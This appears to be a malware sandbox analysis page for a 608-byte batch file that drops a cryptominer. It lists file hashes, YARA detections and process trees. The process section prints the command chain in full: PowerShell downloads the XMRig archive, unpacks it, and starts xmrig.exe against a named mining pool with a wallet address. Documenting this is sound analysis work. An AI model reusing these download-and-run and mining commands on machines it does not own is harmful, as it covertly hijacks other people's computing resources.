Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
1tesy - Copy (10).bat
windows10-1703-x64
10tesy - Copy (11).bat
windows10-1703-x64
10tesy - Copy (12).bat
windows10-1703-x64
10tesy - Copy (13).bat
windows10-1703-x64
10tesy - Copy (14).bat
windows10-1703-x64
10tesy - Copy (2).bat
windows10-1703-x64
10tesy - Copy (3).bat
windows10-1703-x64
10tesy - Copy (4).bat
windows10-1703-x64
10tesy - Copy (5).bat
windows10-1703-x64
10tesy - Copy (6).bat
windows10-1703-x64
10tesy - Copy (7).bat
windows10-1703-x64
10tesy - Copy (8).bat
windows10-1703-x64
10tesy - Copy (9).bat
windows10-1703-x64
10tesy - Copy.bat
windows10-1703-x64
10tesy.bat
windows10-1703-x64
10Analysis
-
max time kernel
1790s -
max time network
1796s -
platform
windows10-1703_x64 -
resource
win10-20231215-en -
resource tags
arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system -
submitted
30/12/2023, 01:27
Static task
static1
Behavioral task
behavioral1
Sample
tesy - Copy (10).bat
Resource
win10-20231215-en
Behavioral task
behavioral2
Sample
tesy - Copy (11).bat
Resource
win10-20231215-en
Behavioral task
behavioral3
Sample
tesy - Copy (12).bat
Resource
win10-20231215-en
Behavioral task
behavioral4
Sample
tesy - Copy (13).bat
Resource
win10-20231215-en
Behavioral task
behavioral5
Sample
tesy - Copy (14).bat
Resource
win10-20231215-en
Behavioral task
behavioral6
Sample
tesy - Copy (2).bat
Resource
win10-20231215-en
Behavioral task
behavioral7
Sample
tesy - Copy (3).bat
Resource
win10-20231215-en
Behavioral task
behavioral8
Sample
tesy - Copy (4).bat
Resource
win10-20231215-en
Behavioral task
behavioral9
Sample
tesy - Copy (5).bat
Resource
win10-20231220-en
Behavioral task
behavioral10
Sample
tesy - Copy (6).bat
Resource
win10-20231215-en
Behavioral task
behavioral11
Sample
tesy - Copy (7).bat
Resource
win10-20231215-en
Behavioral task
behavioral12
Sample
tesy - Copy (8).bat
Resource
win10-20231215-en
Behavioral task
behavioral13
Sample
tesy - Copy (9).bat
Resource
win10-20231215-en
Behavioral task
behavioral14
Sample
tesy - Copy.bat
Resource
win10-20231215-en
General
-
Target
tesy - Copy (10).bat
-
Size
608B
-
MD5
727c8da0478af118c957ae60f7161cab
-
SHA1
cf18105b8659e93bbd2824fa35ef1bae7b395301
-
SHA256
97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab
-
SHA512
d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01
Malware Config
Extracted
https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip
Signatures
-
XMRig Miner payload 64 IoCs
resource yara_rule behavioral1/files/0x000600000001abe8-116.dat family_xmrig behavioral1/files/0x000600000001abe8-116.dat xmrig behavioral1/memory/1608-119-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-120-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-123-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-124-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-127-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-128-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-129-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-130-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-131-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-132-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-133-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-134-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-135-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-136-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-137-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-138-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-139-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-140-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-141-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-142-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-143-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-144-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-145-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-146-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-147-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-148-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-149-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-150-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-151-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-152-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-153-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-154-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-155-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-156-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-157-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-158-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-159-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-160-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-161-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-162-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-163-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-164-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-165-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-166-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-167-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-168-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-169-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-170-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-171-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-172-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-173-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-174-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-175-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-176-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-177-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-178-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-179-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-180-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-181-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-182-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-183-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig behavioral1/memory/1608-184-0x00007FF6295E0000-0x00007FF62A0E3000-memory.dmp xmrig -
Blocklisted process makes network request 2 IoCs
flow pid Process 2 208 powershell.exe 5 208 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 1608 xmrig.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 208 powershell.exe 208 powershell.exe 208 powershell.exe 2224 powershell.exe 2224 powershell.exe 2224 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 208 powershell.exe Token: SeDebugPrivilege 2224 powershell.exe Token: SeLockMemoryPrivilege 1608 xmrig.exe Token: SeLockMemoryPrivilege 1608 xmrig.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1608 xmrig.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 4892 wrote to memory of 208 4892 cmd.exe 15 PID 4892 wrote to memory of 208 4892 cmd.exe 15 PID 4892 wrote to memory of 2224 4892 cmd.exe 76 PID 4892 wrote to memory of 2224 4892 cmd.exe 76 PID 4892 wrote to memory of 1608 4892 cmd.exe 77 PID 4892 wrote to memory of 1608 4892 cmd.exe 77
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip', 'xmrig-6.21.0-gcc-win64.zip')"1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:208
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\tesy - Copy (10).bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4892 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Expand-Archive -Path 'xmrig-6.21.0-gcc-win64.zip' -DestinationPath '.'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2224
-
-
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exexmrig.exe --url pool.hashvault.pro:80 --user 42BWpXvTvDbHpMyHrnjqBA5bqjnB9z65fGakJV9dQuHSS7pRkpoyx5T4vE4pUjJxPoPrLCAerjoKwdMTQKZNNEqo6zoLmPJ --pass tria2 --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b142⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1608
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD556efdb5a0f10b5eece165de4f8c9d799
SHA1fa5de7ca343b018c3bfeab692545eb544c244e16
SHA2566c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108
SHA51291e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc
-
Filesize
1KB
MD594c31167fbd2ee12177e196291b79da1
SHA1f4424c6c48738689bd152f33945dece228224da7
SHA25681eea84461da3e9ecc64ff0f40a469d44af208fb49c4fa6a8dbda69d52da07ab
SHA5128df65a612bbe38d599cf785a0ede9df7bf43cdc587cdb853ea4cb4696620ccc3d5fc826a2a4dc052ff0a033df4846c49cc6c260a3ba24b08040063ed38d8831f
-
Filesize
381KB
MD5cf304c9a31fc5166a6cbc60ea0901d9b
SHA1cdb41f4ee9e0f1c6b5ac1e3e8430f14022f71fe2
SHA256925b0fd4834e404d2573539a9d56ef36f11f437958faad812d3862bf4a1b8686
SHA512d79d8fc6a205a3f621127effe748f8d8927dc7b4c4ec23de3efe9b7d517a31dce6afbafa5670de65b8022f0a53ac17f8e52adc689491b1d34bb32e5d2721ccb5
-
Filesize
92KB
MD5bf81885c3e45ed8362740683d8f66042
SHA14990c4894c2fd9a7dc309afbd75488ff1339f08b
SHA256c325c6366cc49c29a245ccc0bb034dc027ae507d1a9bc8acc42cf933f7c45b8d
SHA5129aa1245a2d56179d47d4ee1f583012faa9ef012bfddb7d264a80dc8c2ea95e7a5db20d2fe12bf417151eeb918392ab859e78080e452e5dc4e4b2a672e2aceaa1